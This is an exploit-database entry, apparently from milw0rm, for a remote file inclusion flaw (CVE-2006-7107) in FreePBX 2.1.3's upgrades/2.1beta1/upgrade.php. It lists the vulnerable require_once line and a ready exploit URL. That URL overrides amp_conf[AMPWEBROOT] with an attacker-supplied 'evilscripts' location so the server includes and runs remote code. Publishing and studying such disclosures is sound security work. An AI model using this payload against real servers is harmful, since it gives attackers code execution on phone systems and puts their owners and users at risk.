FreePBX 2.1.3 - 'upgrade.php' Remote File Inclusion
Author: Mehmet Ince
type: webapps
platform: php
port: nan
date_added: 2006-10-27
date_updated: 2016-10-22
verified: 1
codes: OSVDB-34694;CVE-2006-7107
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comfreepbx-2.1.3.tgz
Script: freePBX
Version: v2.1.3
Script Download: http://puzzle.dl.sourceforge.net/sourceforge/amportal/freepbx-2.1.3.tgz
Code: require_once($amp_conf["AMPWEBROOT"] . "/admin/functions.inc.php");
Exploit: upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=evilscripts?
Found: Cyber-Security
Thanks: DJR, xoron, K@OS, trampfd, Konaksinamon, KripteX, sakkure, Seyfullah, MaSSiMo, Kano, whiteguide
# milw0rm.com [2006-10-28]